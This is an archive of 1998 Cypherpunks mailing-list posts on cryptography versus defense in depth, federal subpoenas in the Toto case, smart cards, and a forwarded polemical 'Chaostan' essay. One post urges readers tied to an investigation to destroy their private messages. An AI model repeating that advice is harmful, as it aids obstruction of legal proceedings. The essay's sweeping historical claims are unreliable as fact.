MIME-Version: 1.0
Content-Type: text/plain



In message <3.0.1.32.19981028093825.00a3f2d0@pop.bos.platinum.com>, Hal Lockhar
> 
> I hear you saying, "but what if the guy is trying to break into my system."
>  I would argue, that if you are using strong cryptographic authentication
> (whether his identity can be mapped to a human being or not) then either 1)
> he will fail, in which case you don't care or 2) he will succeed, in which
> case he must have used some technique like stealing a key which cannot be
> detected by monitoring.

Why do you assume that the flaw that lets the bad guy in is cryptographic?
I recently analyzed every CERT advisory ever issued.  85% of them
described problems that crypto couldn't fix.  Buffer overflow is the
culprit du jour, but it's hardly the only one.  (This year, the prize
for second place -- admittedly a distant second -- went to crypto modules.)
> 
> I raise this point, because I see it as part of a current trend to resist
> stong security measures in preference to weak ones.  The current industry
> facination with weak measures, like firewalls and intrusion detection
> systems has caused some people to resist the introduction of strong
> measures, such as cryptographic authentication and data protection.  The
> most popular example of this is the foolish practice of putting an SSL
> server, with its vital server private key, outside the firewall in a DMZ.  

That's only a flaw if you assume that there are other weak points on
the Web server that a firewall can protect.  If you lock down the host
so that only port 80 is exposed (and maybe a cryptographically protected
administrative port), what good does the firewall do?  The weakest point
is probably the CGI scripts, and those have to be exposed in any event.
> 
> But I have also heard system administrators protest the introduction of
> cryptographic solutions because some current half measure will no longer
> work.  There are even misguided individuals who have proposed putting
> master decryption keys at vulnerable locations like border routers, so that
> messages can be inspected in the fly.

There are no panaceas, there is no single technology (and that emphatically
includes crypto) that will solve this problem.  Defense in depth is our
best hope, which means firewalls plus crypto plus IDS plus better operating
systems and programming languages.  Most of all, it means engineering a
solution -- making the right set of tradeoffs, even if unobvious.

Let me give an analogy.  On most electrical equipment, the ground pin
is useless -- *unless* there has been another insulation or air gap
failure within the device, a failure that would render the frame "hot".
But because of the ground pin, such a failure will instead short the
hot lead to ground, tripping the breaker.  It thus takes two failures
to electrocute someone.  *But* -- toasters and other devices with
exposed heating elements don't use this technique.  Why not?  Well,
with an exposed electrode, the probability of direct contact with a live
wire is much greater.  And if you ground the frame of the toaster,
there's now a direct, high-quality path to ground that in turn is
in contact with the other hand of the poor fool who is poking at a
piece of bread with a fork.  In other words, what's a safety mechanism
in your refrigerator is a danger in your toaster -- and sometimes,
that can be true of crypto as well.

For another analogy, think of insecurity as entropy.  You can't destroy
it, but you can move it around.  Using crypto moves the problem from
the (in)security of the links to the (in)security of the keys.  If
you can't protect your keys -- and that generally takes much more than
crypto -- using cryptography hasn't bought you anything.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Thu, 29 Oct 1998 05:01:52 +0800
To: cypherpunks@cyberpass.net
Subject: Re: MIB Subpoenas
In-Reply-To: <v0313030fb25d0e67bc14@[209.66.100.110]>
Message-ID: <v03130311b25d2c26be8b@[209.66.100.110]>
MIME-Version: 1.0
Content-Type: text/plain



At 11:28 AM -0800 10/28/98, John Young wrote:

>Note also that all the suspects used a variety of aliases, so the
>Feds allege, just like CJ is mani-nymed in Gilmore's subpoena.

And the requests for "help" (Jeff Gordon to the Cypherpunks list), help
with finding out who Toto communicated with, help with what his messages
meant...well, it looks to me like a conspiracy case is being made.

(The nexus in Washington, near Bell, and the nexus with AP, is indicative.)

The first thing I did when I heard about the latest case, that of Toto, was
to purge any private mail messages between myself and Toto or any of his
alleged nyms. (My backups  may have old messages, but I've been trying to
find them all and destroy or recopy them sans the Toto messages.)

I advise any of you with links to the idea of anonymous murders and AP to
do the same. Soon.

--Tim May

Y2K: A good chance to reformat America's hard drive and empty the trash.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Thu, 29 Oct 1998 03:47:10 +0800
To: "Brown, R Ken" <cypherpunks@cyberpass.net
Subject: Re: Soccer Moms?
In-Reply-To: <896C7C3540C3D111AB9F00805FA78CE2013F84C8@MSX11002>
Message-ID: <v04011701b25d0cdce838@[206.189.103.230]>
MIME-Version: 1.0
Content-Type: text/plain



At 8:28 AM -0500 10/13/98, Brown, R Ken wrote:
>In the middle of an interesting article about digital cash, forwarded
>here by Bob Hettinga, there was the line:
>
>> After all, the kind of soccer moms who elected Bill Clinton
>
>"Divided by a common language" as I am  I genuinly don't know what that
>means. And I can't even guess from context. I'd have expected a dig at
>liberals or feminists or welfare recipients at that point; and I can't
>work out what soccer has to do with it.
>
>Do mothers play soccer much in the USA?
>
>Football (as the 95% of the world's population that aren't either
>English-speaking North Americans or else Rugby fans call the Beautiful
>Game) is associated in my mind with young men, specifically working
>class men. It's connotations are entirely macho, even violent.  When a
>big match is on men gather in pubs and bars and shout at TVs whilst
>knocking back the lager. You avoid the centre of town if you don't want
>to risk getting involved in a fight.  People get *killed* at football
>matches.  That's pretty much true in every big city inthe world outside
>North America (and Japan where the fans are polite).
>
>This honestly isn't a troll - I am in fact bewildered by the phrase.

	I am currently in the process of catching up on C-punks, did this
get answered to your satisfaction?
--
"To sum up: The entire structure of antitrust statutes in this country is a
jumble of economic irrationality and ignorance. It is a product: (a) of a
gross misinterpretation of history, and (b) of rather nave, and certainly
unrealistic, economic theories." Alan Greenspan, "Anti-trust"
http://www.ecosystems.net/mgering/antitrust.html

Petro::E-Commerce Adminstrator::Playboy Ent. Inc.::petro@playboy.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Thu, 29 Oct 1998 06:18:46 +0800
To: cypherpunks@toad.com
Subject: Re: No Subject
Message-ID: <36378CD4.4E77@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



> Shift registers are cracked.
>
OK. But if used prior to another cipher wouldn't it substantially
complicate the job of, say, looking for English letter distributions in
a test decryption?

I like the other explanation of the hash isolating the key bits from the
whitening operation and adequately serving the same purpose as another
source.

> Traditional block ciphers are expensive bleach, take note.
> Unnecessary.
>
Expensive how? In terms of CPU time?
What alternative makes traditional block ciphers obsolete?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 29 Oct 1998 03:02:37 +0800
To: "Brown, R Ken" <mmotyka@lsil.com>
Subject: RE: UK police chase crooks on CCTV (fwd)
In-Reply-To: <896C7C3540C3D111AB9F00805FA78CE2013F850A@MSX11002>
Message-ID: <4.0.2.19981028120127.03c24310@panix.com>
MIME-Version: 1.0
Content-Type: text/plain



So when are they going to arrest Gorby and Fidel?  They killed more people.

DCF

At 04:57 AM 10/22/98 -0500, Brown, R Ken wrote:
>> William H. Geiger III[SMTP:whgiii@invweb.net] wrote (among other
>> stuff):
>> 
>> 
>> What we need is a mechanism to punish the politicians
>> who go down the Big Brother path *and* the companies
>> who are making big profits helping them. 
>> IMHO the UK, and the rest of Europe, is a lost cause,
>> it's sheeple are too brainwashed
>
>The best bit of news of the last few days is Pinochet's arrest. It
>lifted my heart. Almost made up for the all 
>the bad stuff the UK government has been coming out with. 
>(Also it brought Thatcher out of the woodwork. Like a large segment of
>the British Tory party she really is/was an authoritarian, 
>paying lip-service to the Free Market for political reasons. You can
>tell them by the company they keep.) 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Thu, 29 Oct 1998 06:22:17 +0800
To: cypherpunks@toad.com
Subject: Re: personal tracking
Message-ID: <36378EC3.6028@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



There was an SBIR solicitation for an amusing version of this several
years ago. They ( army? ) wanted a robotic version that would detect and
'affix' itself to the target. Probably been built already. I can see
them now : popping out of the ground like bouncing bettys, dropping from
trees like mountain lions, crawling up your leg like disease-carrying
ticks...each one with its own address and destruct code.

Connection to crypto - secure communications probably.

****
TITLE: Tracking and Reporting System (TRS)
OBJECTIVE: To conceive, design, implement, and develop a small
(vest-pocket-size) satellite transceiver that can be overtly (and
possibly
covertly) affixed to personnel, vehicles, or goods in transit for the
purpose of tracking and position reporting of the host. 








  







     Prev by Date: 1999 U$ budget for facial recognition 
     Next by Date: airline id 
     Prev by thread: 1999 U$ budget for facial recognition 
     Next by thread: airline id 
     Index(es): 
          Date 
          Thread




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 29 Oct 1998 04:05:55 +0800
To: cypherpunks@cyberpass.net
Subject: Re: MIB Subpoenas
In-Reply-To: <m3r9vs99w3.fsf@localhost.localdomain>
Message-ID: <Version.32.19981028133337.011346a0@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



[Misspelled subject corrected - my initial fault, SSM.]

Tim points out the risks of Grand Jury appearance and need
for legal counsel outside the hearing.

We'll add that it's fairly common to use Grand Jury testimony
to ensnare a target - and not only Bill - who thinks there's not
much to worry about based on the friendly strokes beforehand
by velvet-gloved agents. 

It's the false testimony, perjury, that sinks the hook. Especially 
when hit with unexpected questions about matters for which
no preparation has been made, those usually completely unlike 
what the friendly agents suggested was the main reason for 
politely asking for cooperation (not telling what they already
knew the target knows and will try to hide). 

Presumably an attorney would prepare for this, but not all, 
especially if time is limited and the target does not think there's 
any need to fully brief counsel (even dare to fancy lawyers
aint so smart).

A prime suspect in the African Embassy bombings, US citizen 
Wadi el Hage, was induced to come up to NYC from Texas in this 
fashion, testified before the GJ and was immediately arrested for 
giving false testimony to questions ranging over several years of 
his experiences and prior statements to the FBI. The Q&A can
be seen at:

   http://jya.com/usa-v-hage+3.htm

Note that while all the bombers are charged with murder, el Hage
is multiply-charged with perjury.

Note also that all the suspects used a variety of aliases, so the
Feds allege, just like CJ is mani-nymed in Gilmore's subpoena.

Also, in this case at least two of the four suspects have recently
been isolated from outside contact, on the pretext that they may
communicate orders to "terrorists," but, more probably because they
are cooperating with prosecutors who do not want the lovely
relationship to be interrupted by outsiders. Or the Feds want to
send a signal that that is the case to spook those being sought,
and the two not cooperating.

As Jim Choate noted, the implied threat of hellish treatment if
you don't cooperate produces heebie-jeebies and overhwhelming
desire to get your life back to normal everyday, familiar panic. 

And if you're in jail nursed by MIB and strangers in stripes, such a 
threat erodes what's left of your iron discipline to never, ever squeal 
on comrades.

NY Times front-paged yesterday the controversy over prosecutors
offering leniency for testifying against cohorts. During the summer
an appeals panel declared such practice be bribery prohibited under 
a 50-year-old law and ruled that it is illegal. Within hours a higher court 
overruled the panel, and the issue is expected to go to the Supremes.

Even so, the panel made some indelible remarks about prosecutors
not being above the law:

  In their densely worded opinion, the panel examined precedents
  as far back as the Magna Carta, which imposed limits on the
  exercise of sovereign power. The law prohibiting "whoever" from
  offering a witness anything of value in exchange for testimony
  should apply, the judges said, to prosecutors as well as to
  everyone else.


  "Decency, security and liberty alike," the panel said, "demand that
  Government officials shall be subject to the same rules of conduct
  that are commands to the citizen."

As expected, prosecutors were furious at the panel's decision, as
were many judges, claiming that the practice was hundreds of years
old and convictions could not be obtained without it. One judge said
the decision was "amazingly unsound, not to mention nonsensical."

The Times notes that the Miranda decision got the same reception,
and was fought fiercely by the status quo investors in the justice 
system.

It's a good article for preparing to meet the good and bad MIB trolling
for all too trusting, easily spooked rubes, a/k/a terrorists, a/k/a assassins.

In answer to a query about the 3rd subpoena recipient: it's not to a 
CDR or anon remailer operator.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Thu, 29 Oct 1998 04:41:45 +0800
To: cypherpunks@cyberpass.net
Subject: IP: CHAOSTAN
Message-ID: <v04020a63b25d22e4cfb5@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Delivered-To: ignition-point@majordomo.pobox.com
Date: Wed, 28 Oct 1998 00:26:49 -0800
To: ignition-point@majordomo.pobox.com
From: "A.C." <angie@computerhut.net>
Subject: IP: CHAOSTAN: EARLY WARNING REPORT.
Sender: owner-ignition-point@majordomo.pobox.com
Precedence: list
Reply-To: "A.C." <angie@computerhut.net>

Richard was a reporter for the US Army, in Germany, until recently.  I hope
I recall the correct branch of the military, Richard, that you served as a
reporter with.  Richard ran into a whole lot of trouble when he began to
expose some rather "controversial" things he saw, that involved US troops
in the former Yugoslavia.   See also the article below Richard's brief
missive, written by Richard Maybury, editor of EARLY WARNING report
newsletter.  It is probably one of the best written essays on the subject
of our now universal dillema.  Maybury's handle on history makes it all the
more credible, especially as he shows the parallels with the present.  AC
---------------------------------------------------
>Date: Tue, 27 Oct 1998 22:00:38 -0800
>From: Richard=20
>To: Angie Carlson <angie@computerhut.net>
>Subject: Richard Holbrooke
>
>Angie,
>Did you see Richard Holbrooke on the PBS Newshour With Jim Lehrer on
>Tues. Oct. 27? He talked about sending more troops to Macedonia because
>of the Kosovo situation and that "It's been a plan for years." But he
>also says they have "an emergency evacuation plan for every person."
>I was surprised Judy Woodruff mentioned the danger of taking U.S. troops
>
>hostage. This had previously been something of a taboo subject in U.S.
>media.
>This "plan for some years" of sending more U.N./NATO troops to Macedonia
>
>may be what I came up against in January of 1994. The planners didn't
>want Americans to learn about the threat to U.S. troops in this region
>of the world.
>Best wishes,
>Rick Haverinen
>-----------------------------------------------------------------
Richard Maybury's U.S. and World EARLY WARNING REPORT

 Free Articles
http://www.stockscape.com/newsletters/maybury/free1.htm

      NEWSLETTER
                        FREE ARTICLES
                                           SUBSCRIBE
                                                               CONTACT
 Chaostan, the Full Story

 Dear Reader,

Having invented the Chaostan model, I'm embarrassed to admit I have
never written a complete explanation of it. Investors found it so
valuable that Henry-Madison Research and EWR began to grow rapidly and
I have been unable to find time to give you the full story until now.

Chaostan is pronounced Chaos-tan, with the emphasis on Chaos. In
Central Asia, the suffix "stan" means "the land of." Uzbekistan, for
instance, is the land of the Uzbeks. I coined the term Chaostan to
mean the land of the Great Chaos. It comprises the area from the
Arctic Ocean to the Indian Ocean and Poland to the Pacific Ocean, plus
North Africa. This is roughly a third of the earth's land surface.

To understand Chaostan, we must first understand these two lines; they
are the most important you will ever see. They represent the "standard
of living" or, if you prefer, "quality of life" of the typical
individual in western civilization. This can be measured however you
wish to measure it -- quantity of food, number of bathtubs, warmth of
clothing, number of telephones, speed of transportation, amount of
entertainment or medical care, and so forth.

Line 1 is the line we have all been taught. We leave school thinking
civilization advanced slowly but steadily over thousands of years
until we reached our present high level.

This line is false. Line 2 is the real line. Nearly all progress
happened recently and suddenly. The typical individual in 1500 AD
lived little better than in 1500 BC. He had little food, little
clothing or shelter, and so much disease, filth and ignorance he was
lucky to survive till age 30; most died in childhood. Until recently,
poverty was so awful that even royalty lived in conditions we would
regard as horrifying.

What happened to cause this sudden, dramatic takeoff? What year did
the sharp escalation begin?

1776. You can verify this yourself and I urge you to do so. Walk
around your home and make a list of everything you have that was
developed after 1776. Electricity, indoor plumbing, plastic, aluminum,
central heating, air conditioning, plywood, refrigerators, nylon,
jogging shoes, inner spring mattresses, rayon, facial tissue,
stainless steel, corn flakes, underwear, radio... Then make another
list of everything developed before 1776. Do the same in a hospital
and dentist's office. Compare the lists and ask yourself what your
life would have been like if you had lived before 1776.

For thousands of years up until the American Revolution, our ancestors
lived just barely above the base line of human existence. Destitution
had been the normal condition since Adam and Eve. The past two
centuries -- a mere eyeblink in the vast span of history -- have been
a spectacular exception.

I do not exaggerate when I say that at least once a week I give thanks
that I was born when and where I was -- in America after 1776.

Why did the American Revolution have this wonderful effect? The answer
is the story of Chaostan. It begins, as almost everything in today's
political world begins, in ancient Rome.

After Roman civilization in Europe fell apart around 500 AD, Europe
was taken over by hundreds of independent cutthroats called feudal
lords. Each set up his own little kingdom of a square mile or so, with
a castle at the center. The people on this tiny estate were the lord's
property--his serfs--to be taxed, regulated and killed as he saw fit.
This was the Dark Ages, a time of starvation, endless war, ignorance
and bottomless misery. The Roman legal system had died along with the
Empire, so Europe had no law. Two people embroiled in a dispute had to
work it out on their own. The feudal lord seldom paid much attention;
he didn't care as long as the taxes kept rolling in.

When a dispute occurred, there was often bloodshed. To avoid this,
participants in disputes increasingly called on neutral third parties
to hear both sides of their stories and make decisions. Usually, the
most trusted person in a community was a clergyman and some clergymen
made careers of hearing disputes and making judgments. They became
judges.

Being clergymen, these judges' decisions in each case were based on
religious principles such as "Thou shalt not steal," and "Thou shalt
not kill."

Decisions were preserved in writing as precedents for later decisions.
This collection of precedents became a body of "case law" (law derived
from actual cases).

One problem. Often people were from different religions. Which
principles should a judge apply? Judges hit on the idea of using the
principles all religions hold in= common.

There are two: (1) Do all you have agreed to do. This became the basis
of contract law. (2) Do not encroach on other persons or their
property. This became the basis of tort law and some criminal law.

These two laws taught by all religions were held to be common to all
persons and they became the foundation of the body of precedents
called Common Law. (All this is fully explained in my Uncle Eric book
WHATEVER HAPPENED TO JUSTICE?)



Another problem. Governments hated the two fundamental laws. They
wanted the privilege of breaking agreements, stealing, killing and
doing whatever else they= pleased.

Right from the beginning, there was conflict between governments and
Common Law judges, and these judges were under extreme pressure to
make exceptions for public officials. This is the meaning of the
so-called divine right of kings. Governments declared that, although
they were as human as everyone else, God had given them the special
right to violate the two fundamental laws.

The modern version of the divine right of kings is what I call the
divine right of the majority. In democracies it is held that the
government can do anything it pleases if the majority or their
representatives vote for it.

Thanks to the divine right of kings, the heavy taxes, regulations and
wars kept the people in crushing poverty.

In England, a huge underground economy sprang up to escape the taxes
and regulations.

Finally, after 1492, shipbuilding advanced enough for people to cross
the ocean to America to escape their governments, and thousands did.
England's underground economy was transplanted to America, where it
flourished. Virtually every adult was engaged in smuggling or tax
evasion of one sort or another.

The early Americans hated the government's political law, but in
regard to Common Law, were probably some of the most law abiding
people ever to walk the earth. They were not perfect, but they had,
after all, risked their lives crossing the ocean to live under the
principles of this law. These principles came not from a legislature
of crooked politicians, but from their religions.

By 1765, enjoying very little taxation or regulation, Americans had
become the wealthiest population on earth.

Here it is important to note that the American Revolution was a
revolution. These were Englishmen fighting their own government. They
did not split from England until July 4, 1776, which was fifteen
months after the war started. Government officials in England decided
to tap into the colonists' wealth. They sent tax collectors.

The tax collectors were tarred and feathered.

They sent troops to protect the tax collectors.

At Lexington and Concord in 1775, the troops arrived to confiscate the
American colonists' guns, and the colonists decided to fight. Then, in
1776, the colonists overthrew their government and, in their
Declaration of Independence said, "All men are created equal." No
special privileges--everyone obeys the two fundamental laws.





After the 1776 revolution, the American founders set up a new
government with a Constitution and Bill of Rights based on the two
fundamental laws.

[The Common Law orgins of the American system are traced in the
Pultizer Prize winning book THE IDEOLOGICAL ORIGINS OF THE AMERICAN
REVOLUTION by Bernard Bailyn, Harvard University Press, 1967.]

The size and power of this government was severely limited and its
ability to steal ("tax") was reduced almost to zero. Until the 20th
century, the tiny US government was supported only by import taxes and
taxes on liquor and tobacco; there was no income tax.

America became a haven for flight capital as people all over the world
began investing their money here. With this mountain of capital to
work with, new businesses sprang up like mushrooms, and inventors such
as Robert Fulton and Eli Whitney were able to acquire funds to develop
a vast array of new machines to make life better. This is where we get
the term "American ingenuity." When he died in 1931, Thomas Edison had
more than a thousand patents.

This mountain of capital also enabled industrialists to produce and
sell these new items at prices everyone could afford, while paying the
world's highest wages.

America still had a lot of flaws, the worst being slavery and the
genocide of the Native American Indians, but it was the freest, most
prosperous land ever known.

The Old World remained so wretchedly poor that archaeological evidence
from American slave dwellings shows Europe's heavily taxed and
regulated middle class did not live as well as America's slaves.

The rest of the world saw America's great wealth and liberty and
wanted it for themselves. In the 1800s, millions came here, and
millions more stayed at home and fought to limit their governments.

Now we come to three questions that are crucial for understanding
Chaostan: (1) Why was the Battle of Lexington called the Shot Heard
Round The World, not the Shot Heard Round America? (2) When the French
gave us the Statue of Liberty, why did they name it Liberty
Enlightening the World, not Liberty Enlightening America? (3) Why does
the statue face outward toward Europe, not inward toward America?





The principles of the 1776 revolution began to spread around the
world, and the nations where they became established came to be known
as the Free World. These nations are also the richest. Liberty is the
source of prosperity. This, incidentally, is the meaning of the
Henry-Madison Company's logo, a Liberty Bell with an economic chart
showing rapid advancement. (The company is named after Patrick Henry
and James Madison.)

America is the only country in history that has been, not so much a
place, as an idea.

Unfortunately, the mid-1800s brought catastrophe. The economic
philosophy that had destroyed the Roman Empire was revived. This was
socialism. Bread and circuses. The all-powerful state.

This old Roman system legitimatized covetousness and claimed
"redistribution of wealth" is not stealing if it is done with good
intentions. It began to spread like a prairie fire and quickly became
so popular that it overwhelmed the philosophy of America's Founders
and buried the principles of Common Law. This is why today few know
anything about the original American philosophy or the two laws which
gave it birth.

The spread of liberty was halted. This map shows the lands where it
had become established before its progress was reversed.

As we would expect, liberty had sunk its deepest roots in regions with
the strongest British Common Law heritage -- America, Canada, Britain,
Australia and New Zealand.=

In a few areas, liberty was introduced forcibly, as when Douglas
MacArthur imposed it on Japan after the second world war. The jury is
still out as to whether the Japanese will retain it or revert to their
old statist ways.

India was a British colony and liberty did take root there, but
socialism was too popular for it to grow. India remains poor, with a
per capita gross national product (GNP) of only $1,300 per year. (In
the US it is $24,700.)

For a while in the early 1800s, Latin America appeared to be on the
verge of adopting liberty. Instead, these countries got sidetracked
and went for democracy -- majority rule -- and the majority liked
socialism. The richest Latin country is Mexico with a per capita GDP
of only $8,200.

In Africa, liberty never had a chance. Nearly all the African
revolutions were 100% socialist, and today Africa is the poorest place
on earth. Zaire's per capita GNP is $500, which is not unusual in
Africa.



In Europe, liberty had become well established as far east as Vienna,
and to a lesser extent in the east European nations of Czechoslovakia,
Latvia, Lithuania and Estonia. Some knowledge of it reached Moscow
under Kerensky in 1917, but the movement was quickly snuffed out by
socialists. Today, East Europe, Russia and Asia remain almost entirely
ignorant of the system of liberty. They are mired in unworkable
statist systems and hundreds of millions of people live only slightly
above the base line.

In other words, Chaostan -- the land of the Great Chaos --  is the
main area that never developed legal systems based on the two
fundamental laws. (Or if they did, they allowed government officials
the special privilege of violating these laws.)

This schematic is derived from a map in the 10/95 EWR. It shows that
the Balkan peninsula has long been one of the bloodiest parts of
Chaostan because this is where three major religious cultures collide.



Since the beginning of history, this area has been inhabited by
hundreds of nations, tribes and ethnic groups that have hated and
fought each other incessantly. Russia alone contains some 250 of these
groups and they know nothing of the legal principles that make an
advanced, peaceful civilization possible. Worse, there is no one to
teach them, for the West has forgotten these principles, too.

The importance of all this was hidden by the Cold War. From 1945 to
1990, the US and Soviet governments divided the world into two
"spheres of influence," and Russia sat on its sphere like a lid on a
pressure cooker. Peace in Chaostan was artificial; the hundreds of
fractious groups under the Kremlin's thumb had not been
civilized--they had only been suppressed. Now that the lid is off the
pressure cooker, the explosion has begun. The area is returning to its
original condition of poverty and war. Saddam Hussein was the first to
realize the Kremlin's weakness was an opportunity to settle old
scores. Since the fall of the Soviet Empire, no less than 17 wars have
broken out in Chaostan.

Travel around the world and study the economies of the countries you
visit. You will see a pattern. The more socialistic a country is, the
poorer it is. The former USSR is the textbook example. It was poor
when the Soviet Empire was at its peak and it remains poor today. A
degree of advancement can be achieved through force, by telling people
to work or die, but slaves do only the minimum necessary to escape
punishment and have little interest in progress. The mighty USSR was a
Third World nation with missiles.


After the USSR broke up, the Russians were deceived. They were taught
democracy. When the Berlin Wall fell in 1989, they were led to believe
that if they got majority rule like America, they would get rich like
America. It did not work because it cannot work.

In all the thousands of years of human history, the only thing that
has been found to work is liberty -- the two fundamental laws. When
these laws are widely obeyed by everyone, including government
officials, life gets better. When they are disobeyed, life gets worse;
it is automatic. We don't know why our species is made this way, we
only know we are.

These principles cannot be established by a government, for
governments claim the special right to violate them, and hypocrites
are laughed at. The principles must exist in the hearts and minds of
the people, which means they must be anchored in the peoples'
philosophical beliefs.

Unfortunately, even in America these principles have been almost
totally erased, so there is no one to teach the principles to the
inhabitants of Chaostan. These people have learned only the simplistic
notion of democracy -- majority rule.

Wait a minute, you say, if the principles are so important, and if
America has forgotten them, how does America continue?

Momentum. This great land and all the rest of the Free World still
have the principles embedded in their legal systems, but few know or
care about this. When the momentum runs out, we will head down the
same road as the former USSR. This is why I write the Uncle Eric
series of books: to help reverse this decline.

Look again at Line 2. Perhaps the twenty most important words you will
ever read are these: When the two laws are not widely obeyed by
everyone, including the government, a civilization returns to the base
line.

This was demonstrated over and over again in Africa. Colonialism was
bad enough, but after Africans threw off their European rulers, they
jumped from the colonial frying pan to the socialist fire. The result
was a descent into poverty and war reminiscent of the Dark Ages.

This descent is what is happening now in Chaostan, and what will
happen to us if we do not revive the two fundamental laws.

At bottom, there are only three possible political conditions --
liberty, tyranny or chaos. All political systems are variations of
these. For the people of Chaostan, liberty is not an option. They are
condemned to either tyranny or chaos, for they have never known
anything else and there is no one to teach them.

Until 1989, the former USSR had tyranny. Since then they have had
chaos, and now I believe they are ready for a return to tyranny. But
not all the hundreds of groups originally conquered by the Kremlin
will submit. We can only guess at what will happen, but it will not be
pretty.



SUMMARY

War, tyranny and poverty have been the normal conditions of mankind
throughout history. My personal estimate is that 99% of everything
good that ever happened to our species happened in one fell swoop, in
the brief two centuries since 1776. This was due to the discovery and
application of the two fundamental Common Law principles that make
liberty and prosperity possible.

After 1776, these principles began to spread around the world.

Unfortunately, by 1900, this movement had been choked off by the
revival of socialism. Large parts of the earth never got the
principles, and the largest, which I call Chaostan, is now reverting
to its original condition of war, tyranny and poverty.

The principles of liberty are being rediscovered and if we all do our
best to spread the word, I believe we have a good chance to rescue the
Free World. But Chaostan is too far gone. The area is so huge, it will
continue causing major changes in the world economy and investment
markets. This will mean big losses for those who do not understand,
and big profits for those who do. I will keep you informed.

Created by Stockscape Stockscape Technologies Ltd.,
 All Rights Reserved


****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Thu, 29 Oct 1998 04:31:40 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Microsoft Enters Smart Card Market
Message-ID: <v04020a67b25d24b23c34@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Delivered-To: ignition-point@majordomo.pobox.com
X-Sender: believer@telepath.com
Date: Wed, 28 Oct 1998 11:31:51 -0600
To: believer@telepath.com
From: believer@telepath.com
Subject: IP: Microsoft Enters Smart Card Market
Mime-Version: 1.0
Sender: owner-ignition-point@majordomo.pobox.com
Precedence: list
Reply-To: believer@telepath.com

Source:  New York Times
http://www.nytimes.com/library/tech/yr/mo/biztech/articles/28card.html

October 28, 1998

Microsoft Enters Smart Card Market

By BLOOMBERG NEWS

PARIS -- The Microsoft Corporation introduced a tiny
computer-operating system for smart cards Tuesday as well as
support for the system from 20 hardware makers.

Smart cards contain microchips that store personal or financial data,
allowing access while securing the information from unauthorized use.
They are already used widely in Europe in digital mobile phones,
pre-paid telephone cards and bank cards.

Microsoft is betting that smart cards will take off as the growing use of
hand-held computer devices and electronic commerce creates demand
for more secure ways of accessing computer networks. The company,
which is based in Redmond, Wash., is competing against Sun
Microsystems Inc. in the smart-card market, pitting its Windows system
against Sun's Java programming language.

"We brought back our work on smart cards a year-and-a-half ago when
we saw increasing demand for authentication of a user's identity to access
a network and an explosion in demand for on-line electronic commerce,"
said Craig Mundie, senior vice president for consumer platforms at
Microsoft.

He presented the new product at the Cartes 98 Smart Card conference
in Paris. He said test versions of the product would be ready in the first
quarter of next year and the final product by mid-year.

The Windows operating system for smart cards will have memory
capacity of 4.5 kilobytes, compared with 300 kilobytes for Windows
CE, which is used in hand-held computers.

Windows cards will cost issuers about $3 each, compared with $20 for
Java-based cards.

Sun officials could not immediately be reached for comment.

The worldwide market for chip cards will jump nearly fivefold, to $6.8
billion, in 2002, from $1.4 billion in 1997, according to Dataquest Inc., a
unit of Gartner Group Inc.
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------


****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal Lockhart <Harold.Lockhart@platinum.com>
Date: Thu, 29 Oct 1998 05:18:58 +0800
To: Steve Bellovin <smb@research.att.com>
Subject: Re: log files (was: Re: dbts: Cryptographic Dog Stocks, The Dirigible Biplane, and Sending the Wizards Back to Menlo Park )
In-Reply-To: <199810281713.MAA29423@postal.research.att.com>
Message-ID: <3.0.1.32.19981028153554.00a4cc3c@pop.bos.platinum.com>
MIME-Version: 1.0
Content-Type: text/plain



Steve,

I think in general we are in violent agreement, as are most real world
practitioners I have spoken to.  I won't even argue about whether your
original comment constituted "resisting a strong measure in favor of a weak
